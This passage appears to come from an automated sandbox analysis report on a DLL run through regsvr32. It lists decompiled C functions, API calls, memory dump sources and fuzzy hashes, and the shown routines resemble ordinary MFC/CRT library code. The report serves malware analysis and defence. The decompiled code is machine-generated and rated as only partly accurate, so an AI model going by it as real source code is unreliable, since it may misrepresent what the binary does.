                                                                                                                  • Part of subcall function 100198A8: ConvertDefaultLocale.KERNEL32(?), ref: 10019937
                                                                                                                  • Part of subcall function 100198A8: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 1001994B
                                                                                                                  • Part of subcall function 100198A8: ConvertDefaultLocale.KERNEL32(?), ref: 1001996F
                                                                                                                  • Part of subcall function 100198A8: ConvertDefaultLocale.KERNEL32(000003FF), ref: 10019975
                                                                                                                  • Part of subcall function 100198A8: GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 100199AE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3HandlePath_strcpy_s
                                                                                                                • String ID: %s.dll
                                                                                                                • API String ID: 3444012488-3668843792
                                                                                                                • Opcode ID: cea5404daed0731a6b219cd8afe4b1a0dd88c16b486085c71d9734a1623cfebb
                                                                                                                • Instruction ID: 0b7e9202130163ae395afdc0551c1bbeafcf20f4336e4298d0e5f786ec062517
                                                                                                                • Opcode Fuzzy Hash: cea5404daed0731a6b219cd8afe4b1a0dd88c16b486085c71d9734a1623cfebb
                                                                                                                • Instruction Fuzzy Hash: FB019675A00118ABDB18DBB4DD569EEB3F9EB44B00F0101B9A902D7141EA74EA84CAA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1003F023 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 51%
                                                                                                                			E1003F023(void* __ecx, void* __edi) {
				signed short _v16;
				signed short _v20;
				char _v24;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t7;
				void* _t18;
				intOrPtr* _t19;
				void* _t24;
				signed int _t25;

				_t7 =  *0x100b9b10; // 0xffffffff
				_t32 = _t7 - 0xffffffff;
				if(_t7 != 0xffffffff) {
					return _t7;
				}
				_push(_t18);
				_push(_t24);
				_t19 = GetProcAddress(E1000F67A( *((intOrPtr*)( *((intOrPtr*)(E1001E302(_t18, __edi, _t24, _t32) + 0x78))))), "DllGetVersion");
				_t25 = 0x40000;
				if(_t19 != 0) {
					E10049170(__edi,  &_v24, 0, 0x14);
					_push( &_v24);
					_v24 = 0x14;
					if( *_t19() >= 0) {
						_t25 = (_v20 & 0x0000ffff) << 0x00000010 | _v16 & 0x0000ffff;
					}
				}
				 *0x100b9b10 = _t25;
				return _t25;
			}














                                                                                                                0x1003f026
                                                                                                                0x1003f02e
                                                                                                                0x1003f031
                                                                                                                0x1003f094
                                                                                                                0x1003f094
                                                                                                                0x1003f033
                                                                                                                0x1003f034
                                                                                                                0x1003f050
                                                                                                                0x1003f054
                                                                                                                0x1003f059
                                                                                                                0x1003f063
                                                                                                                0x1003f06e
                                                                                                                0x1003f06f
                                                                                                                0x1003f07a
                                                                                                                0x1003f087
                                                                                                                0x1003f087
                                                                                                                0x1003f07a
                                                                                                                0x1003f089
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                  • Part of subcall function 1000F67A: GetModuleHandleA.KERNEL32(?,?,10013E00,InitCommonControlsEx,00000000,10014775,00040000,00008000,?,?,1001754E,?,00040000), ref: 1000F686
                                                                                                                  • Part of subcall function 1000F67A: LoadLibraryA.KERNEL32(?), ref: 1000F696
                                                                                                                • GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 1003F04A
                                                                                                                • _memset.LIBCMT ref: 1003F063
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleLibraryLoadModuleProc_memset
                                                                                                                • String ID: DllGetVersion
                                                                                                                • API String ID: 3385804498-2861820592
                                                                                                                • Opcode ID: 9b5a934c88ab926237a1358001a910c6e2e6749b50adbe1f8f877cbf1e32a76a
                                                                                                                • Instruction ID: 83cedfc33295a2b91a424a6dec3734a2390b18edd068e67cc7ee030c49faf0e2
                                                                                                                • Opcode Fuzzy Hash: 9b5a934c88ab926237a1358001a910c6e2e6749b50adbe1f8f877cbf1e32a76a
                                                                                                                • Instruction Fuzzy Hash: 64F08175A003295AE701EBFC9C85AAE73E8EB04755F100275FA60F71A2D770DD0487A5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10021BD1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 83%
                                                                                                                			E10021BD1(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, struct HWND__* _a4, intOrPtr _a8) {
				signed int _v8;
				char _v20;
				void* __esi;
				signed int _t7;
				signed int _t16;
				intOrPtr _t18;
				intOrPtr _t23;
				intOrPtr _t24;
				struct HWND__* _t25;
				signed int _t26;

				_t24 = __edi;
				_t23 = __edx;
				_t18 = __ebx;
				_t7 =  *0x100b9e70; // 0xbb35530
				_v8 = _t7 ^ _t26;
				_t25 = _a4;
				if(_t25 != 0) {
					if((GetWindowLongA(_t25, 0xfffffff0) & 0x0000000f) != _a8) {
						goto L1;
					} else {
						GetClassNameA(_t25,  &_v20, 0xa);
						_t16 = E1001286D( &_v20, "combobox");
						asm("sbb eax, eax");
						_t11 =  ~_t16 + 1;
					}
				} else {
					L1:
					_t11 = 0;
				}
				return E1004763E(_t11, _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}













                                                                                                                0x10021bd1
                                                                                                                0x10021bd1
                                                                                                                0x10021bd1
                                                                                                                0x10021bd7
                                                                                                                0x10021bde
                                                                                                                0x10021be2
                                                                                                                0x10021be7
                                                                                                                0x10021bfc
                                                                                                                0x00000000
                                                                                                                0x10021bfe
                                                                                                                0x10021c05
                                                                                                                0x10021c14
                                                                                                                0x10021c1c
                                                                                                                0x10021c1f
                                                                                                                0x10021c1f
                                                                                                                0x10021be9
                                                                                                                0x10021be9
                                                                                                                0x10021be9
                                                                                                                0x10021be9
                                                                                                                0x10021c2c

                                                                                                                APIs
                                                                                                                • GetWindowLongA.USER32(00000000,000000F0), ref: 10021BF0
                                                                                                                • GetClassNameA.USER32(00000000,?,0000000A), ref: 10021C05
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClassLongNameWindow
                                                                                                                • String ID: combobox
                                                                                                                • API String ID: 1147815241-2240613097
                                                                                                                • Opcode ID: a21c1ffcec8f1da76df6aac1aacb11c6c99fde7dd74364291cb2495d92a06b95
                                                                                                                • Instruction ID: b712a396dd2164fb9b1ba4218fa7ea712223ec1a3925b5c20f6cf45ffa4882a6
                                                                                                                • Opcode Fuzzy Hash: a21c1ffcec8f1da76df6aac1aacb11c6c99fde7dd74364291cb2495d92a06b95
                                                                                                                • Instruction Fuzzy Hash: F5F0B435915529AFDB01EFB4CC81DEE73BCEB06350B91061AE812E7180DB34F90487D5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1001A66C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15threadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 86%
                                                                                                                			E1001A66C(void* __esi, void* __eflags) {
				void* _t3;
				void* _t4;
				struct HHOOK__* _t6;
				void* _t7;
				void* _t8;

				_t3 = E1001E302(_t7, _t8, __esi, __eflags);
				_t13 =  *((char*)(_t3 + 0x14));
				if( *((char*)(_t3 + 0x14)) == 0) {
					_push(__esi);
					_t4 = E1001DD4F(_t7, _t8, __esi, _t13);
					_t6 = SetWindowsHookExA(0xffffffff, E1001A4D8, 0, GetCurrentThreadId());
					 *(_t4 + 0x2c) = _t6;
					return _t6;
				}
				return _t3;
			}








                                                                                                                0x1001a66c
                                                                                                                0x1001a671
                                                                                                                0x1001a675
                                                                                                                0x1001a677
                                                                                                                0x1001a678
                                                                                                                0x1001a68f
                                                                                                                0x1001a695
                                                                                                                0x00000000
                                                                                                                0x1001a698
                                                                                                                0x1001a699

                                                                                                                APIs
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 1001A67F
                                                                                                                • SetWindowsHookExA.USER32(000000FF,V$>,00000000,00000000), ref: 1001A68F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentHookThreadWindows
                                                                                                                • String ID: V$>
                                                                                                                • API String ID: 1904029216-2039469509
                                                                                                                • Opcode ID: 6bcfa455536766ac0d7911c28b510cea6815940c407937d04ec7f1fe53434717
                                                                                                                • Instruction ID: ed438374310f535bd5856febee57efaef843a1edf130da502d0a4a26ef8a0b4a
                                                                                                                • Opcode Fuzzy Hash: 6bcfa455536766ac0d7911c28b510cea6815940c407937d04ec7f1fe53434717
                                                                                                                • Instruction Fuzzy Hash: 6BD0A7768042606FF711F7706D0DB993AC4DB02320F1D0385F5229E0E2C634D8C04755
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10020973 Relevance: 5.1, APIs: 4, Instructions: 60COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 60%
                                                                                                                			E10020973(long* __ecx, intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				void* _t31;
				intOrPtr _t32;
				signed int _t38;
				struct _CRITICAL_SECTION* _t39;
				intOrPtr* _t44;
				long* _t47;
				intOrPtr* _t50;

				_push(__ecx);
				_t50 = _a4;
				_t38 = 1;
				_t47 = __ecx;
				_v8 = 1;
				if( *((intOrPtr*)(_t50 + 8)) <= 1) {
					L10:
					_t39 =  &(_t47[7]);
					EnterCriticalSection(_t39);
					E100205EA( &(_t47[5]), _t50);
					LeaveCriticalSection(_t39);
					LocalFree( *(_t50 + 0xc));
					 *((intOrPtr*)( *_t50))(1);
					_t31 = TlsSetValue( *_t47, 0);
					L11:
					return _t31;
				} else {
					goto L1;
				}
				do {
					L1:
					_t32 = _a8;
					if(_t32 == 0 ||  *((intOrPtr*)(_t47[4] + 4 + _t38 * 8)) == _t32) {
						_t44 =  *((intOrPtr*)( *(_t50 + 0xc) + _t38 * 4));
						if(_t44 != 0) {
							 *((intOrPtr*)( *_t44))(1);
						}
						_t31 =  *(_t50 + 0xc);
						 *(_t31 + _t38 * 4) =  *(_t31 + _t38 * 4) & 0x00000000;
					} else {
						_t31 =  *(_t50 + 0xc);
						if( *(_t31 + _t38 * 4) != 0) {
							_v8 = _v8 & 0x00000000;
						}
					}
					_t38 = _t38 + 1;
				} while (_t38 <  *((intOrPtr*)(_t50 + 8)));
				if(_v8 == 0) {
					goto L11;
				}
				goto L10;
			}











                                                                                                                0x10020976
                                                                                                                0x1002097b
                                                                                                                0x1002097e
                                                                                                                0x10020983
                                                                                                                0x10020985
                                                                                                                0x10020988
                                                                                                                0x100209cc
                                                                                                                0x100209cc
                                                                                                                0x100209d0
                                                                                                                0x100209da
                                                                                                                0x100209e0
                                                                                                                0x100209e9
                                                                                                                0x100209f5
                                                                                                                0x100209fb
                                                                                                                0x10020a01
                                                                                                                0x10020a05
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002098a
                                                                                                                0x1002098a
                                                                                                                0x1002098a
                                                                                                                0x1002098f
                                                                                                                0x100209ac
                                                                                                                0x100209b1
                                                                                                                0x100209b7
                                                                                                                0x100209b7
                                                                                                                0x100209b9
                                                                                                                0x100209bc
                                                                                                                0x1002099a
                                                                                                                0x1002099a
                                                                                                                0x100209a1
                                                                                                                0x100209a3
                                                                                                                0x100209a3
                                                                                                                0x100209a1
                                                                                                                0x100209c0
                                                                                                                0x100209c1
                                                                                                                0x100209ca
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 100209D0
                                                                                                                • LeaveCriticalSection.KERNEL32(?,?), ref: 100209E0
                                                                                                                • LocalFree.KERNEL32(?), ref: 100209E9
                                                                                                                • TlsSetValue.KERNEL32(?,00000000), ref: 100209FB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$EnterFreeLeaveLocalValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 2949335588-0
                                                                                                                • Opcode ID: ae7b940fcce18e32b92972ffe26dfb51c37e5d792b9645ba6a4d0d9e624cd0c4
                                                                                                                • Instruction ID: a85c05a7aeec6e8a90cd7c592f85a2f889a8b8ae44a3cefc8c347544680011c3
                                                                                                                • Opcode Fuzzy Hash: ae7b940fcce18e32b92972ffe26dfb51c37e5d792b9645ba6a4d0d9e624cd0c4
                                                                                                                • Instruction Fuzzy Hash: C8113735A00705EFE710CF54E984B9AB7A6FF46356F60846AF583871A2CBB1A990CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10021F6C Relevance: 5.0, APIs: 4, Instructions: 37COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 82%
                                                                                                                			E10021F6C(void* __ebx, void* __esi, void* __ebp, signed int _a4) {
				void* __edi;
				struct _CRITICAL_SECTION* _t4;
				void* _t7;
				void* _t10;
				signed int _t11;
				void* _t14;
				intOrPtr* _t15;
				void* _t17;

				_t17 = __ebp;
				_t14 = __esi;
				_t7 = __ebx;
				_t11 = _a4;
				_t20 = _t11 - 0x11;
				if(_t11 >= 0x11) {
					_t4 = E1000A069(__ebx, _t10, _t11, __esi, _t20);
				}
				if( *0x100bdcd0 == 0) {
					_t4 = E10021F03();
				}
				_push(_t7);
				_push(_t17);
				_push(_t14);
				_t15 = 0x100bde88 + _t11 * 4;
				if( *_t15 == 0) {
					EnterCriticalSection(0x100bde70);
					if( *_t15 == 0) {
						_t4 = 0x100bdcd8 + _t11 * 0x18;
						InitializeCriticalSection(_t4);
						 *_t15 =  *_t15 + 1;
					}
					LeaveCriticalSection(0x100bde70);
				}
				EnterCriticalSection(0x100bdcd8 + _t11 * 0x18);
				return _t4;
			}











                                                                                                                0x10021f6c
                                                                                                                0x10021f6c
                                                                                                                0x10021f6c
                                                                                                                0x10021f6d
                                                                                                                0x10021f71
                                                                                                                0x10021f74
                                                                                                                0x10021f76
                                                                                                                0x10021f76
                                                                                                                0x10021f82
                                                                                                                0x10021f84
                                                                                                                0x10021f84
                                                                                                                0x10021f89
                                                                                                                0x10021f90
                                                                                                                0x10021f91
                                                                                                                0x10021f92
                                                                                                                0x10021fa1
                                                                                                                0x10021fa8
                                                                                                                0x10021fad
                                                                                                                0x10021fb4
                                                                                                                0x10021fb7
                                                                                                                0x10021fbd
                                                                                                                0x10021fbd
                                                                                                                0x10021fc4
                                                                                                                0x10021fc4
                                                                                                                0x10021fd0
                                                                                                                0x10021fd6

                                                                                                                APIs
                                                                                                                • EnterCriticalSection.KERNEL32(100BDE70,?,?,?,?,1002053F,00000010,00000008,1001E330,1001E2A6,1000A083,1001E37A,1000CC6B,00000000,1000CCF1,00000001), ref: 10021FA8
                                                                                                                • InitializeCriticalSection.KERNEL32(10006BB6,?,?,?,?,1002053F,00000010,00000008,1001E330,1001E2A6,1000A083,1001E37A,1000CC6B,00000000,1000CCF1,00000001), ref: 10021FB7
                                                                                                                • LeaveCriticalSection.KERNEL32(100BDE70,?,?,?,?,1002053F,00000010,00000008,1001E330,1001E2A6,1000A083,1001E37A,1000CC6B,00000000,1000CCF1,00000001), ref: 10021FC4
                                                                                                                • EnterCriticalSection.KERNEL32(10006BB6,?,?,?,?,1002053F,00000010,00000008,1001E330,1001E2A6,1000A083,1001E37A,1000CC6B,00000000,1000CCF1,00000001), ref: 10021FD0
                                                                                                                  • Part of subcall function 1000A069: __CxxThrowException@8.LIBCMT ref: 1000A07D
                                                                                                                  • Part of subcall function 1000A069: __EH_prolog3.LIBCMT ref: 1000A08A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$Enter$Exception@8H_prolog3InitializeLeaveThrow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2895727460-0
                                                                                                                • Opcode ID: 64f4ec0a678fd876fe4ee42fffd3b8208d407861c015f56a8549a8abe23736b7
                                                                                                                • Instruction ID: e149e14db0e00e2cb13c8202d8dfa839a74b6037fcc35bbcfa2c368ff7671eea
                                                                                                                • Opcode Fuzzy Hash: 64f4ec0a678fd876fe4ee42fffd3b8208d407861c015f56a8549a8abe23736b7
                                                                                                                • Instruction Fuzzy Hash: 11F0F67B1042158BE280EB58ED84689F6ABFBA2285F92023BF15046011E7719480C6A2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1002047D Relevance: 5.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1002047D(long* __ecx, signed int _a4) {
				void* _t9;
				struct _CRITICAL_SECTION* _t12;
				signed int _t14;
				long* _t16;

				_t16 = __ecx;
				_t1 =  &(_t16[7]); // 0x100bdc5c
				_t12 = _t1;
				EnterCriticalSection(_t12);
				_t14 = _a4;
				if(_t14 <= 0) {
					L5:
					LeaveCriticalSection(_t12);
					return 0;
				}
				_t3 =  &(_t16[3]); // 0x3
				if(_t14 >=  *_t3) {
					goto L5;
				}
				_t9 = TlsGetValue( *_t16);
				if(_t9 == 0 || _t14 >=  *((intOrPtr*)(_t9 + 8))) {
					goto L5;
				} else {
					LeaveCriticalSection(_t12);
					return  *((intOrPtr*)( *((intOrPtr*)(_t9 + 0xc)) + _t14 * 4));
				}
			}







                                                                                                                0x1002047f
                                                                                                                0x10020482
                                                                                                                0x10020482
                                                                                                                0x10020486
                                                                                                                0x1002048c
                                                                                                                0x10020492
                                                                                                                0x100204bb
                                                                                                                0x100204bc
                                                                                                                0x00000000
                                                                                                                0x100204c2
                                                                                                                0x10020494
                                                                                                                0x10020497
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002049b
                                                                                                                0x100204a3
                                                                                                                0x00000000
                                                                                                                0x100204aa
                                                                                                                0x100204b1
                                                                                                                0x00000000
                                                                                                                0x100204b7

                                                                                                                APIs
                                                                                                                • EnterCriticalSection.KERNEL32(100BDC5C,?,?,?,10020AC8,?,00000004,1001E311,1000A083,1001E37A,1000CC6B,00000000,1000CCF1,00000001,?,1000CECE), ref: 10020486
                                                                                                                • TlsGetValue.KERNEL32 ref: 1002049B
                                                                                                                • LeaveCriticalSection.KERNEL32(100BDC5C,?,?,?,10020AC8,?,00000004,1001E311,1000A083,1001E37A,1000CC6B,00000000,1000CCF1,00000001,?,1000CECE), ref: 100204B1
                                                                                                                • LeaveCriticalSection.KERNEL32(100BDC5C,?,?,?,10020AC8,?,00000004,1001E311,1000A083,1001E37A,1000CC6B,00000000,1000CCF1,00000001,?,1000CECE), ref: 100204BC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$Leave$EnterValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 3969253408-0
                                                                                                                • Opcode ID: 918742f588fd345076f23ae14a5de573fbe5f3d54cd501eb2ce4c57920c32872
                                                                                                                • Instruction ID: b5a73c87c3e66ad61877701d9cf1b3bb21c3fb29a7b113b59b8626512fd4f99e
                                                                                                                • Opcode Fuzzy Hash: 918742f588fd345076f23ae14a5de573fbe5f3d54cd501eb2ce4c57920c32872
                                                                                                                • Instruction Fuzzy Hash: 0EF05EB62007509FD210DF24DD8888A73FAFB84255366C99AFA4293112C6B4F8458AE1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:16.7%
                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                Signature Coverage:0.1%
                                                                                                                Total number of Nodes:1055
                                                                                                                Total number of Limit Nodes:17
